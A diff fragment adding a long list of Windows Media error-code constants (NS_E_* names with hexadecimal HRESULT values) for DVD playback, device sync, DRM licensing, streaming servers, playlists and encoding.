+NS_E_DVD_DISC_COPY_PROTECT_OUTPUT_FAILED = 0xC00D1161
+NS_E_DVD_NO_SUBPICTURE_STREAM = 0xC00D1162
+NS_E_DVD_COPY_PROTECT = 0xC00D1163
+NS_E_DVD_AUTHORING_PROBLEM = 0xC00D1164
+NS_E_DVD_INVALID_DISC_REGION = 0xC00D1165
+NS_E_DVD_COMPATIBLE_VIDEO_CARD = 0xC00D1166
+NS_E_DVD_MACROVISION = 0xC00D1167
+NS_E_DVD_SYSTEM_DECODER_REGION = 0xC00D1168
+NS_E_DVD_DISC_DECODER_REGION = 0xC00D1169
+NS_E_DVD_NO_VIDEO_STREAM = 0xC00D116A
+NS_E_DVD_NO_AUDIO_STREAM = 0xC00D116B
+NS_E_DVD_GRAPH_BUILDING = 0xC00D116C
+NS_E_DVD_NO_DECODER = 0xC00D116D
+NS_E_DVD_PARENTAL = 0xC00D116E
+NS_E_DVD_CANNOT_JUMP = 0xC00D116F
+NS_E_DVD_DEVICE_CONTENTION = 0xC00D1170
+NS_E_DVD_NO_VIDEO_MEMORY = 0xC00D1171
+NS_E_DVD_CANNOT_COPY_PROTECTED = 0xC00D1172
+NS_E_DVD_REQUIRED_PROPERTY_NOT_SET = 0xC00D1173
+NS_E_DVD_INVALID_TITLE_CHAPTER = 0xC00D1174
+NS_E_NO_CD_BURNER = 0xC00D1176
+NS_E_DEVICE_IS_NOT_READY = 0xC00D1177
+NS_E_PDA_UNSUPPORTED_FORMAT = 0xC00D1178
+NS_E_NO_PDA = 0xC00D1179
+NS_E_PDA_UNSPECIFIED_ERROR = 0xC00D117A
+NS_E_MEMSTORAGE_BAD_DATA = 0xC00D117B
+NS_E_PDA_FAIL_SELECT_DEVICE = 0xC00D117C
+NS_E_PDA_FAIL_READ_WAVE_FILE = 0xC00D117D
+NS_E_IMAPI_LOSSOFSTREAMING = 0xC00D117E
+NS_E_PDA_DEVICE_FULL = 0xC00D117F
+NS_E_FAIL_LAUNCH_ROXIO_PLUGIN = 0xC00D1180
+NS_E_PDA_DEVICE_FULL_IN_SESSION = 0xC00D1181
+NS_E_IMAPI_MEDIUM_INVALIDTYPE = 0xC00D1182
+NS_E_PDA_MANUALDEVICE = 0xC00D1183
+NS_E_PDA_PARTNERSHIPNOTEXIST = 0xC00D1184
+NS_E_PDA_CANNOT_CREATE_ADDITIONAL_SYNC_RELATIONSHIP = 0xC00D1185
+NS_E_PDA_NO_TRANSCODE_OF_DRM = 0xC00D1186
+NS_E_PDA_TRANSCODECACHEFULL = 0xC00D1187
+NS_E_PDA_TOO_MANY_FILE_COLLISIONS = 0xC00D1188
+NS_E_PDA_CANNOT_TRANSCODE = 0xC00D1189
+NS_E_PDA_TOO_MANY_FILES_IN_DIRECTORY = 0xC00D118A
+NS_E_PROCESSINGSHOWSYNCWIZARD = 0xC00D118B
+NS_E_PDA_TRANSCODE_NOT_PERMITTED = 0xC00D118C
+NS_E_PDA_INITIALIZINGDEVICES = 0xC00D118D
+NS_E_PDA_OBSOLETE_SP = 0xC00D118E
+NS_E_PDA_TITLE_COLLISION = 0xC00D118F
+NS_E_PDA_DEVICESUPPORTDISABLED = 0xC00D1190
+NS_E_PDA_NO_LONGER_AVAILABLE = 0xC00D1191
+NS_E_PDA_ENCODER_NOT_RESPONDING = 0xC00D1192
+NS_E_PDA_CANNOT_SYNC_FROM_LOCATION = 0xC00D1193
+NS_E_WMP_PROTOCOL_PROBLEM = 0xC00D1194
+NS_E_WMP_NO_DISK_SPACE = 0xC00D1195
+NS_E_WMP_LOGON_FAILURE = 0xC00D1196
+NS_E_WMP_CANNOT_FIND_FILE = 0xC00D1197
+NS_E_WMP_SERVER_INACCESSIBLE = 0xC00D1198
+NS_E_WMP_UNSUPPORTED_FORMAT = 0xC00D1199
+NS_E_WMP_DSHOW_UNSUPPORTED_FORMAT = 0xC00D119A
+NS_E_WMP_PLAYLIST_EXISTS = 0xC00D119B
+NS_E_WMP_NONMEDIA_FILES = 0xC00D119C
+NS_E_WMP_INVALID_ASX = 0xC00D119D
+NS_E_WMP_ALREADY_IN_USE = 0xC00D119E
+NS_E_WMP_IMAPI_FAILURE = 0xC00D119F
+NS_E_WMP_WMDM_FAILURE = 0xC00D11A0
+NS_E_WMP_CODEC_NEEDED_WITH_4CC = 0xC00D11A1
+NS_E_WMP_CODEC_NEEDED_WITH_FORMATTAG = 0xC00D11A2
+NS_E_WMP_MSSAP_NOT_AVAILABLE = 0xC00D11A3
+NS_E_WMP_WMDM_INTERFACEDEAD = 0xC00D11A4
+NS_E_WMP_WMDM_NOTCERTIFIED = 0xC00D11A5
+NS_E_WMP_WMDM_LICENSE_NOTEXIST = 0xC00D11A6
+NS_E_WMP_WMDM_LICENSE_EXPIRED = 0xC00D11A7
+NS_E_WMP_WMDM_BUSY = 0xC00D11A8
+NS_E_WMP_WMDM_NORIGHTS = 0xC00D11A9
+NS_E_WMP_WMDM_INCORRECT_RIGHTS = 0xC00D11AA
+NS_E_WMP_IMAPI_GENERIC = 0xC00D11AB
+NS_E_WMP_IMAPI_DEVICE_NOTPRESENT = 0xC00D11AD
+NS_E_WMP_IMAPI_DEVICE_BUSY = 0xC00D11AE
+NS_E_WMP_IMAPI_LOSS_OF_STREAMING = 0xC00D11AF
+NS_E_WMP_SERVER_UNAVAILABLE = 0xC00D11B0
+NS_E_WMP_FILE_OPEN_FAILED = 0xC00D11B1
+NS_E_WMP_VERIFY_ONLINE = 0xC00D11B2
+NS_E_WMP_SERVER_NOT_RESPONDING = 0xC00D11B3
+NS_E_WMP_DRM_CORRUPT_BACKUP = 0xC00D11B4
+NS_E_WMP_DRM_LICENSE_SERVER_UNAVAILABLE = 0xC00D11B5
+NS_E_WMP_NETWORK_FIREWALL = 0xC00D11B6
+NS_E_WMP_NO_REMOVABLE_MEDIA = 0xC00D11B7
+NS_E_WMP_PROXY_CONNECT_TIMEOUT = 0xC00D11B8
+NS_E_WMP_NEED_UPGRADE = 0xC00D11B9
+NS_E_WMP_AUDIO_HW_PROBLEM = 0xC00D11BA
+NS_E_WMP_INVALID_PROTOCOL = 0xC00D11BB
+NS_E_WMP_INVALID_LIBRARY_ADD = 0xC00D11BC
+NS_E_WMP_MMS_NOT_SUPPORTED = 0xC00D11BD
+NS_E_WMP_NO_PROTOCOLS_SELECTED = 0xC00D11BE
+NS_E_WMP_GOFULLSCREEN_FAILED = 0xC00D11BF
+NS_E_WMP_NETWORK_ERROR = 0xC00D11C0
+NS_E_WMP_CONNECT_TIMEOUT = 0xC00D11C1
+NS_E_WMP_MULTICAST_DISABLED = 0xC00D11C2
+NS_E_WMP_SERVER_DNS_TIMEOUT = 0xC00D11C3
+NS_E_WMP_PROXY_NOT_FOUND = 0xC00D11C4
+NS_E_WMP_TAMPERED_CONTENT = 0xC00D11C5
+NS_E_WMP_OUTOFMEMORY = 0xC00D11C6
+NS_E_WMP_AUDIO_CODEC_NOT_INSTALLED = 0xC00D11C7
+NS_E_WMP_VIDEO_CODEC_NOT_INSTALLED = 0xC00D11C8
+NS_E_WMP_IMAPI_DEVICE_INVALIDTYPE = 0xC00D11C9
+NS_E_WMP_DRM_DRIVER_AUTH_FAILURE = 0xC00D11CA
+NS_E_WMP_NETWORK_RESOURCE_FAILURE = 0xC00D11CB
+NS_E_WMP_UPGRADE_APPLICATION = 0xC00D11CC
+NS_E_WMP_UNKNOWN_ERROR = 0xC00D11CD
+NS_E_WMP_INVALID_KEY = 0xC00D11CE
+NS_E_WMP_CD_ANOTHER_USER = 0xC00D11CF
+NS_E_WMP_DRM_NEEDS_AUTHORIZATION = 0xC00D11D0
+NS_E_WMP_BAD_DRIVER = 0xC00D11D1
+NS_E_WMP_ACCESS_DENIED = 0xC00D11D2
+NS_E_WMP_LICENSE_RESTRICTS = 0xC00D11D3
+NS_E_WMP_INVALID_REQUEST = 0xC00D11D4
+NS_E_WMP_CD_STASH_NO_SPACE = 0xC00D11D5
+NS_E_WMP_DRM_NEW_HARDWARE = 0xC00D11D6
+NS_E_WMP_DRM_INVALID_SIG = 0xC00D11D7
+NS_E_WMP_DRM_CANNOT_RESTORE = 0xC00D11D8
+NS_E_WMP_BURN_DISC_OVERFLOW = 0xC00D11D9
+NS_E_WMP_DRM_GENERIC_LICENSE_FAILURE = 0xC00D11DA
+NS_E_WMP_DRM_NO_SECURE_CLOCK = 0xC00D11DB
+NS_E_WMP_DRM_NO_RIGHTS = 0xC00D11DC
+NS_E_WMP_DRM_INDIV_FAILED = 0xC00D11DD
+NS_E_WMP_SERVER_NONEWCONNECTIONS = 0xC00D11DE
+NS_E_WMP_MULTIPLE_ERROR_IN_PLAYLIST = 0xC00D11DF
+NS_E_WMP_IMAPI2_ERASE_FAIL = 0xC00D11E0
+NS_E_WMP_IMAPI2_ERASE_DEVICE_BUSY = 0xC00D11E1
+NS_E_WMP_DRM_COMPONENT_FAILURE = 0xC00D11E2
+NS_E_WMP_DRM_NO_DEVICE_CERT = 0xC00D11E3
+NS_E_WMP_SERVER_SECURITY_ERROR = 0xC00D11E4
+NS_E_WMP_AUDIO_DEVICE_LOST = 0xC00D11E5
+NS_E_WMP_IMAPI_MEDIA_INCOMPATIBLE = 0xC00D11E6
+NS_E_SYNCWIZ_DEVICE_FULL = 0xC00D11EE
+NS_E_SYNCWIZ_CANNOT_CHANGE_SETTINGS = 0xC00D11EF
+NS_E_TRANSCODE_DELETECACHEERROR = 0xC00D11F0
+NS_E_CD_NO_BUFFERS_READ = 0xC00D11F8
+NS_E_CD_EMPTY_TRACK_QUEUE = 0xC00D11F9
+NS_E_CD_NO_READER = 0xC00D11FA
+NS_E_CD_ISRC_INVALID = 0xC00D11FB
+NS_E_CD_MEDIA_CATALOG_NUMBER_INVALID = 0xC00D11FC
+NS_E_SLOW_READ_DIGITAL_WITH_ERRORCORRECTION = 0xC00D11FD
+NS_E_CD_SPEEDDETECT_NOT_ENOUGH_READS = 0xC00D11FE
+NS_E_CD_QUEUEING_DISABLED = 0xC00D11FF
+NS_E_WMP_DRM_ACQUIRING_LICENSE = 0xC00D1202
+NS_E_WMP_DRM_LICENSE_EXPIRED = 0xC00D1203
+NS_E_WMP_DRM_LICENSE_NOTACQUIRED = 0xC00D1204
+NS_E_WMP_DRM_LICENSE_NOTENABLED = 0xC00D1205
+NS_E_WMP_DRM_LICENSE_UNUSABLE = 0xC00D1206
+NS_E_WMP_DRM_LICENSE_CONTENT_REVOKED = 0xC00D1207
+NS_E_WMP_DRM_LICENSE_NOSAP = 0xC00D1208
+NS_E_WMP_DRM_UNABLE_TO_ACQUIRE_LICENSE = 0xC00D1209
+NS_E_WMP_LICENSE_REQUIRED = 0xC00D120A
+NS_E_WMP_PROTECTED_CONTENT = 0xC00D120B
+NS_E_WMP_POLICY_VALUE_NOT_CONFIGURED = 0xC00D122A
+NS_E_PDA_CANNOT_SYNC_FROM_INTERNET = 0xC00D1234
+NS_E_PDA_CANNOT_SYNC_INVALID_PLAYLIST = 0xC00D1235
+NS_E_PDA_FAILED_TO_SYNCHRONIZE_FILE = 0xC00D1236
+NS_E_PDA_SYNC_FAILED = 0xC00D1237
+NS_E_PDA_DELETE_FAILED = 0xC00D1238
+NS_E_PDA_FAILED_TO_RETRIEVE_FILE = 0xC00D1239
+NS_E_PDA_DEVICE_NOT_RESPONDING = 0xC00D123A
+NS_E_PDA_FAILED_TO_TRANSCODE_PHOTO = 0xC00D123B
+NS_E_PDA_FAILED_TO_ENCRYPT_TRANSCODED_FILE = 0xC00D123C
+NS_E_PDA_CANNOT_TRANSCODE_TO_AUDIO = 0xC00D123D
+NS_E_PDA_CANNOT_TRANSCODE_TO_VIDEO = 0xC00D123E
+NS_E_PDA_CANNOT_TRANSCODE_TO_IMAGE = 0xC00D123F
+NS_E_PDA_RETRIEVED_FILE_FILENAME_TOO_LONG = 0xC00D1240
+NS_E_PDA_CEWMDM_DRM_ERROR = 0xC00D1241
+NS_E_INCOMPLETE_PLAYLIST = 0xC00D1242
+NS_E_PDA_SYNC_RUNNING = 0xC00D1243
+NS_E_PDA_SYNC_LOGIN_ERROR = 0xC00D1244
+NS_E_PDA_TRANSCODE_CODEC_NOT_FOUND = 0xC00D1245
+NS_E_CANNOT_SYNC_DRM_TO_NON_JANUS_DEVICE = 0xC00D1246
+NS_E_CANNOT_SYNC_PREVIOUS_SYNC_RUNNING = 0xC00D1247
+NS_E_WMP_HWND_NOTFOUND = 0xC00D125C
+NS_E_BKGDOWNLOAD_WRONG_NO_FILES = 0xC00D125D
+NS_E_BKGDOWNLOAD_COMPLETECANCELLEDJOB = 0xC00D125E
+NS_E_BKGDOWNLOAD_CANCELCOMPLETEDJOB = 0xC00D125F
+NS_E_BKGDOWNLOAD_NOJOBPOINTER = 0xC00D1260
+NS_E_BKGDOWNLOAD_INVALIDJOBSIGNATURE = 0xC00D1261
+NS_E_BKGDOWNLOAD_FAILED_TO_CREATE_TEMPFILE = 0xC00D1262
+NS_E_BKGDOWNLOAD_PLUGIN_FAILEDINITIALIZE = 0xC00D1263
+NS_E_BKGDOWNLOAD_PLUGIN_FAILEDTOMOVEFILE = 0xC00D1264
+NS_E_BKGDOWNLOAD_CALLFUNCFAILED = 0xC00D1265
+NS_E_BKGDOWNLOAD_CALLFUNCTIMEOUT = 0xC00D1266
+NS_E_BKGDOWNLOAD_CALLFUNCENDED = 0xC00D1267
+NS_E_BKGDOWNLOAD_WMDUNPACKFAILED = 0xC00D1268
+NS_E_BKGDOWNLOAD_FAILEDINITIALIZE = 0xC00D1269
+NS_E_INTERFACE_NOT_REGISTERED_IN_GIT = 0xC00D126A
+NS_E_BKGDOWNLOAD_INVALID_FILE_NAME = 0xC00D126B
+NS_E_IMAGE_DOWNLOAD_FAILED = 0xC00D128E
+NS_E_WMP_UDRM_NOUSERLIST = 0xC00D12C0
+NS_E_WMP_DRM_NOT_ACQUIRING = 0xC00D12C1
+NS_E_WMP_BSTR_TOO_LONG = 0xC00D12F2
+NS_E_WMP_AUTOPLAY_INVALID_STATE = 0xC00D12FC
+NS_E_WMP_COMPONENT_REVOKED = 0xC00D1306
+NS_E_CURL_NOTSAFE = 0xC00D1324
+NS_E_CURL_INVALIDCHAR = 0xC00D1325
+NS_E_CURL_INVALIDHOSTNAME = 0xC00D1326
+NS_E_CURL_INVALIDPATH = 0xC00D1327
+NS_E_CURL_INVALIDSCHEME = 0xC00D1328
+NS_E_CURL_INVALIDURL = 0xC00D1329
+NS_E_CURL_CANTWALK = 0xC00D132B
+NS_E_CURL_INVALIDPORT = 0xC00D132C
+NS_E_CURLHELPER_NOTADIRECTORY = 0xC00D132D
+NS_E_CURLHELPER_NOTAFILE = 0xC00D132E
+NS_E_CURL_CANTDECODE = 0xC00D132F
+NS_E_CURLHELPER_NOTRELATIVE = 0xC00D1330
+NS_E_CURL_INVALIDBUFFERSIZE = 0xC00D1331
+NS_E_SUBSCRIPTIONSERVICE_PLAYBACK_DISALLOWED = 0xC00D1356
+NS_E_CANNOT_BUY_OR_DOWNLOAD_FROM_MULTIPLE_SERVICES = 0xC00D1357
+NS_E_CANNOT_BUY_OR_DOWNLOAD_CONTENT = 0xC00D1358
+NS_E_NOT_CONTENT_PARTNER_TRACK = 0xC00D135A
+NS_E_TRACK_DOWNLOAD_REQUIRES_ALBUM_PURCHASE = 0xC00D135B
+NS_E_TRACK_DOWNLOAD_REQUIRES_PURCHASE = 0xC00D135C
+NS_E_TRACK_PURCHASE_MAXIMUM_EXCEEDED = 0xC00D135D
+NS_E_SUBSCRIPTIONSERVICE_LOGIN_FAILED = 0xC00D135F
+NS_E_SUBSCRIPTIONSERVICE_DOWNLOAD_TIMEOUT = 0xC00D1360
+NS_E_CONTENT_PARTNER_STILL_INITIALIZING = 0xC00D1362
+NS_E_OPEN_CONTAINING_FOLDER_FAILED = 0xC00D1363
+NS_E_ADVANCEDEDIT_TOO_MANY_PICTURES = 0xC00D136A
+NS_E_REDIRECT = 0xC00D1388
+NS_E_STALE_PRESENTATION = 0xC00D1389
+NS_E_NAMESPACE_WRONG_PERSIST = 0xC00D138A
+NS_E_NAMESPACE_WRONG_TYPE = 0xC00D138B
+NS_E_NAMESPACE_NODE_CONFLICT = 0xC00D138C
+NS_E_NAMESPACE_NODE_NOT_FOUND = 0xC00D138D
+NS_E_NAMESPACE_BUFFER_TOO_SMALL = 0xC00D138E
+NS_E_NAMESPACE_TOO_MANY_CALLBACKS = 0xC00D138F
+NS_E_NAMESPACE_DUPLICATE_CALLBACK = 0xC00D1390
+NS_E_NAMESPACE_CALLBACK_NOT_FOUND = 0xC00D1391
+NS_E_NAMESPACE_NAME_TOO_LONG = 0xC00D1392
+NS_E_NAMESPACE_DUPLICATE_NAME = 0xC00D1393
+NS_E_NAMESPACE_EMPTY_NAME = 0xC00D1394
+NS_E_NAMESPACE_INDEX_TOO_LARGE = 0xC00D1395
+NS_E_NAMESPACE_BAD_NAME = 0xC00D1396
+NS_E_NAMESPACE_WRONG_SECURITY = 0xC00D1397
+NS_E_CACHE_ARCHIVE_CONFLICT = 0xC00D13EC
+NS_E_CACHE_ORIGIN_SERVER_NOT_FOUND = 0xC00D13ED
+NS_E_CACHE_ORIGIN_SERVER_TIMEOUT = 0xC00D13EE
+NS_E_CACHE_NOT_BROADCAST = 0xC00D13EF
+NS_E_CACHE_CANNOT_BE_CACHED = 0xC00D13F0
+NS_E_CACHE_NOT_MODIFIED = 0xC00D13F1
+NS_E_CANNOT_REMOVE_PUBLISHING_POINT = 0xC00D1450
+NS_E_CANNOT_REMOVE_PLUGIN = 0xC00D1451
+NS_E_WRONG_PUBLISHING_POINT_TYPE = 0xC00D1452
+NS_E_UNSUPPORTED_LOAD_TYPE = 0xC00D1453
+NS_E_INVALID_PLUGIN_LOAD_TYPE_CONFIGURATION = 0xC00D1454
+NS_E_INVALID_PUBLISHING_POINT_NAME = 0xC00D1455
+NS_E_TOO_MANY_MULTICAST_SINKS = 0xC00D1456
+NS_E_PUBLISHING_POINT_INVALID_REQUEST_WHILE_STARTED = 0xC00D1457
+NS_E_MULTICAST_PLUGIN_NOT_ENABLED = 0xC00D1458
+NS_E_INVALID_OPERATING_SYSTEM_VERSION = 0xC00D1459
+NS_E_PUBLISHING_POINT_REMOVED = 0xC00D145A
+NS_E_INVALID_PUSH_PUBLISHING_POINT_START_REQUEST = 0xC00D145B
+NS_E_UNSUPPORTED_LANGUAGE = 0xC00D145C
+NS_E_WRONG_OS_VERSION = 0xC00D145D
+NS_E_PUBLISHING_POINT_STOPPED = 0xC00D145E
+NS_E_PLAYLIST_ENTRY_ALREADY_PLAYING = 0xC00D14B4
+NS_E_EMPTY_PLAYLIST = 0xC00D14B5
+NS_E_PLAYLIST_PARSE_FAILURE = 0xC00D14B6
+NS_E_PLAYLIST_UNSUPPORTED_ENTRY = 0xC00D14B7
+NS_E_PLAYLIST_ENTRY_NOT_IN_PLAYLIST = 0xC00D14B8
+NS_E_PLAYLIST_ENTRY_SEEK = 0xC00D14B9
+NS_E_PLAYLIST_RECURSIVE_PLAYLISTS = 0xC00D14BA
+NS_E_PLAYLIST_TOO_MANY_NESTED_PLAYLISTS = 0xC00D14BB
+NS_E_PLAYLIST_SHUTDOWN = 0xC00D14BC
+NS_E_PLAYLIST_END_RECEDING = 0xC00D14BD
+NS_E_DATAPATH_NO_SINK = 0xC00D1518
+NS_E_INVALID_PUSH_TEMPLATE = 0xC00D151A
+NS_E_INVALID_PUSH_PUBLISHING_POINT = 0xC00D151B
+NS_E_CRITICAL_ERROR = 0xC00D151C
+NS_E_NO_NEW_CONNECTIONS = 0xC00D151D
+NS_E_WSX_INVALID_VERSION = 0xC00D151E
+NS_E_HEADER_MISMATCH = 0xC00D151F
+NS_E_PUSH_DUPLICATE_PUBLISHING_POINT_NAME = 0xC00D1520
+NS_E_NO_SCRIPT_ENGINE = 0xC00D157C
+NS_E_PLUGIN_ERROR_REPORTED = 0xC00D157D
+NS_E_SOURCE_PLUGIN_NOT_FOUND = 0xC00D157E
+NS_E_PLAYLIST_PLUGIN_NOT_FOUND = 0xC00D157F
+NS_E_DATA_SOURCE_ENUMERATION_NOT_SUPPORTED = 0xC00D1580
+NS_E_MEDIA_PARSER_INVALID_FORMAT = 0xC00D1581
+NS_E_SCRIPT_DEBUGGER_NOT_INSTALLED = 0xC00D1582
+NS_E_FEATURE_REQUIRES_ENTERPRISE_SERVER = 0xC00D1583
+NS_E_WIZARD_RUNNING = 0xC00D1584
+NS_E_INVALID_LOG_URL = 0xC00D1585
+NS_E_INVALID_MTU_RANGE = 0xC00D1586
+NS_E_INVALID_PLAY_STATISTICS = 0xC00D1587
+NS_E_LOG_NEED_TO_BE_SKIPPED = 0xC00D1588
+NS_E_HTTP_TEXT_DATACONTAINER_SIZE_LIMIT_EXCEEDED = 0xC00D1589
+NS_E_PORT_IN_USE = 0xC00D158A
+NS_E_PORT_IN_USE_HTTP = 0xC00D158B
+NS_E_HTTP_TEXT_DATACONTAINER_INVALID_SERVER_RESPONSE = 0xC00D158C
+NS_E_ARCHIVE_REACH_QUOTA = 0xC00D158D
+NS_E_ARCHIVE_ABORT_DUE_TO_BCAST = 0xC00D158E
+NS_E_ARCHIVE_GAP_DETECTED = 0xC00D158F
+NS_E_AUTHORIZATION_FILE_NOT_FOUND = 0xC00D1590
+NS_E_BAD_MARKIN = 0xC00D1B58
+NS_E_BAD_MARKOUT = 0xC00D1B59
+NS_E_NOMATCHING_MEDIASOURCE = 0xC00D1B5A
+NS_E_UNSUPPORTED_SOURCETYPE = 0xC00D1B5B
+NS_E_TOO_MANY_AUDIO = 0xC00D1B5C
+NS_E_TOO_MANY_VIDEO = 0xC00D1B5D
+NS_E_NOMATCHING_ELEMENT = 0xC00D1B5E
+NS_E_MISMATCHED_MEDIACONTENT = 0xC00D1B5F
+NS_E_CANNOT_DELETE_ACTIVE_SOURCEGROUP = 0xC00D1B60
+NS_E_AUDIODEVICE_BUSY = 0xC00D1B61
+NS_E_AUDIODEVICE_UNEXPECTED = 0xC00D1B62
+NS_E_AUDIODEVICE_BADFORMAT = 0xC00D1B63
+NS_E_VIDEODEVICE_BUSY = 0xC00D1B64
+NS_E_VIDEODEVICE_UNEXPECTED = 0xC00D1B65
+NS_E_INVALIDCALL_WHILE_ENCODER_RUNNING = 0xC00D1B66
+NS_E_NO_PROFILE_IN_SOURCEGROUP = 0xC00D1B67
+NS_E_VIDEODRIVER_UNSTABLE = 0xC00D1B68
+NS_E_VIDCAPSTARTFAILED = 0xC00D1B69
+NS_E_VIDSOURCECOMPRESSION = 0xC00D1B6A
+NS_E_VIDSOURCESIZE = 0xC00D1B6B
+NS_E_ICMQUERYFORMAT = 0xC00D1B6C
+NS_E_VIDCAPCREATEWINDOW = 0xC00D1B6D
+NS_E_VIDCAPDRVINUSE = 0xC00D1B6E
+NS_E_NO_MEDIAFORMAT_IN_SOURCE = 0xC00D1B6F
+NS_E_NO_VALID_OUTPUT_STREAM = 0xC00D1B70
+NS_E_NO_VALID_SOURCE_PLUGIN = 0xC00D1B71
+NS_E_NO_ACTIVE_SOURCEGROUP = 0xC00D1B72
+NS_E_NO_SCRIPT_STREAM = 0xC00D1B73
+NS_E_INVALIDCALL_WHILE_ARCHIVAL_RUNNING = 0xC00D1B74
+NS_E_INVALIDPACKETSIZE = 0xC00D1B75
+NS_E_PLUGIN_CLSID_INVALID = 0xC00D1B76
+NS_E_UNSUPPORTED_ARCHIVETYPE = 0xC00D1B77
+NS_E_UNSUPPORTED_ARCHIVEOPERATION = 0xC00D1B78
+NS_E_ARCHIVE_FILENAME_NOTSET = 0xC00D1B79
+NS_E_SOURCEGROUP_NOTPREPARED = 0xC00D1B7A
+NS_E_PROFILE_MISMATCH = 0xC00D1B7B
+NS_E_INCORRECTCLIPSETTINGS = 0xC00D1B7C
+NS_E_NOSTATSAVAILABLE = 0xC00D1B7D
+NS_E_NOTARCHIVING = 0xC00D1B7E
+NS_E_INVALIDCALL_WHILE_ENCODER_STOPPED = 0xC00D1B7F
+NS_E_NOSOURCEGROUPS = 0xC00D1B80
+NS_E_INVALIDINPUTFPS = 0xC00D1B81
+NS_E_NO_DATAVIEW_SUPPORT = 0xC00D1B82
+NS_E_CODEC_UNAVAILABLE = 0xC00D1B83
+NS_E_ARCHIVE_SAME_AS_INPUT = 0xC00D1B84
+NS_E_SOURCE_NOTSPECIFIED = 0xC00D1B85
+NS_E_NO_REALTIME_TIMECOMPRESSION = 0xC00D1B86
+NS_E_UNSUPPORTED_ENCODER_DEVICE = 0xC00D1B87
+NS_E_UNEXPECTED_DISPLAY_SETTINGS = 0xC00D1B88
+NS_E_NO_AUDIODATA = 0xC00D1B89
+NS_E_INPUTSOURCE_PROBLEM = 0xC00D1B8A
+NS_E_WME_VERSION_MISMATCH = 0xC00D1B8B
+NS_E_NO_REALTIME_PREPROCESS = 0xC00D1B8C
+NS_E_NO_REPEAT_PREPROCESS = 0xC00D1B8D
+NS_E_CANNOT_PAUSE_LIVEBROADCAST = 0xC00D1B8E
+NS_E_DRM_PROFILE_NOT_SET = 0xC00D1B8F
+NS_E_DUPLICATE_DRMPROFILE = 0xC00D1B90
+NS_E_INVALID_DEVICE = 0xC00D1B91
+NS_E_SPEECHEDL_ON_NON_MIXEDMODE = 0xC00D1B92
+NS_E_DRM_PASSWORD_TOO_LONG = 0xC00D1B93
+NS_E_DEVCONTROL_FAILED_SEEK = 0xC00D1B94
+NS_E_INTERLACE_REQUIRE_SAMESIZE = 0xC00D1B95
+NS_E_TOO_MANY_DEVICECONTROL = 0xC00D1B96
+NS_E_NO_MULTIPASS_FOR_LIVEDEVICE = 0xC00D1B97
+NS_E_MISSING_AUDIENCE = 0xC00D1B98
+NS_E_AUDIENCE_CONTENTTYPE_MISMATCH = 0xC00D1B99
+NS_E_MISSING_SOURCE_INDEX = 0xC00D1B9A
+NS_E_NUM_LANGUAGE_MISMATCH = 0xC00D1B9B
+NS_E_LANGUAGE_MISMATCH = 0xC00D1B9C
+NS_E_VBRMODE_MISMATCH = 0xC00D1B9D
+NS_E_INVALID_INPUT_AUDIENCE_INDEX = 0xC00D1B9E
+NS_E_INVALID_INPUT_LANGUAGE = 0xC00D1B9F
+NS_E_INVALID_INPUT_STREAM = 0xC00D1BA0
+NS_E_EXPECT_MONO_WAV_INPUT = 0xC00D1BA1
+NS_E_INPUT_WAVFORMAT_MISMATCH = 0xC00D1BA2
+NS_E_RECORDQ_DISK_FULL = 0xC00D1BA3
+NS_E_NO_PAL_INVERSE_TELECINE = 0xC00D1BA4
+NS_E_ACTIVE_SG_DEVICE_DISCONNECTED = 0xC00D1BA5
+NS_E_ACTIVE_SG_DEVICE_CONTROL_DISCONNECTED = 0xC00D1BA6
+NS_E_NO_FRAMES_SUBMITTED_TO_ANALYZER = 0xC00D1BA7
+NS_E_INPUT_DOESNOT_SUPPORT_SMPTE = 0xC00D1BA8
+NS_E_NO_SMPTE_WITH_MULTIPLE_SOURCEGROUPS = 0xC00D1BA9
+NS_E_BAD_CONTENTEDL = 0xC00D1BAA
+NS_E_INTERLACEMODE_MISMATCH = 0xC00D1BAB
+NS_E_NONSQUAREPIXELMODE_MISMATCH = 0xC00D1BAC
+NS_E_SMPTEMODE_MISMATCH = 0xC00D1BAD
+NS_E_END_OF_TAPE = 0xC00D1BAE
+NS_E_NO_MEDIA_IN_AUDIENCE = 0xC00D1BAF
+NS_E_NO_AUDIENCES = 0xC00D1BB0
+NS_E_NO_AUDIO_COMPAT = 0xC00D1BB1
+NS_E_INVALID_VBR_COMPAT = 0xC00D1BB2
+NS_E_NO_PROFILE_NAME = 0xC00D1BB3
+NS_E_INVALID_VBR_WITH_UNCOMP = 0xC00D1BB4
+NS_E_MULTIPLE_VBR_AUDIENCES = 0xC00D1BB5
+NS_E_UNCOMP_COMP_COMBINATION = 0xC00D1BB6
+NS_E_MULTIPLE_AUDIO_CODECS = 0xC00D1BB7
+NS_E_MULTIPLE_AUDIO_FORMATS = 0xC00D1BB8
+NS_E_AUDIO_BITRATE_STEPDOWN = 0xC00D1BB9
+NS_E_INVALID_AUDIO_PEAKRATE = 0xC00D1BBA
+NS_E_INVALID_AUDIO_PEAKRATE_2 = 0xC00D1BBB
+NS_E_INVALID_AUDIO_BUFFERMAX = 0xC00D1BBC
+NS_E_MULTIPLE_VIDEO_CODECS = 0xC00D1BBD
+NS_E_MULTIPLE_VIDEO_SIZES = 0xC00D1BBE
+NS_E_INVALID_VIDEO_BITRATE = 0xC00D1BBF
+NS_E_VIDEO_BITRATE_STEPDOWN = 0xC00D1BC0
+NS_E_INVALID_VIDEO_PEAKRATE = 0xC00D1BC1
+NS_E_INVALID_VIDEO_PEAKRATE_2 = 0xC00D1BC2
+NS_E_INVALID_VIDEO_WIDTH = 0xC00D1BC3
+NS_E_INVALID_VIDEO_HEIGHT = 0xC00D1BC4
+NS_E_INVALID_VIDEO_FPS = 0xC00D1BC5
+NS_E_INVALID_VIDEO_KEYFRAME = 0xC00D1BC6
+NS_E_INVALID_VIDEO_IQUALITY = 0xC00D1BC7
+NS_E_INVALID_VIDEO_CQUALITY = 0xC00D1BC8
+NS_E_INVALID_VIDEO_BUFFER = 0xC00D1BC9
+NS_E_INVALID_VIDEO_BUFFERMAX = 0xC00D1BCA
+NS_E_INVALID_VIDEO_BUFFERMAX_2 = 0xC00D1BCB
+NS_E_INVALID_VIDEO_WIDTH_ALIGN = 0xC00D1BCC
+NS_E_INVALID_VIDEO_HEIGHT_ALIGN = 0xC00D1BCD
+NS_E_MULTIPLE_SCRIPT_BITRATES = 0xC00D1BCE
+NS_E_INVALID_SCRIPT_BITRATE = 0xC00D1BCF
+NS_E_MULTIPLE_FILE_BITRATES = 0xC00D1BD0
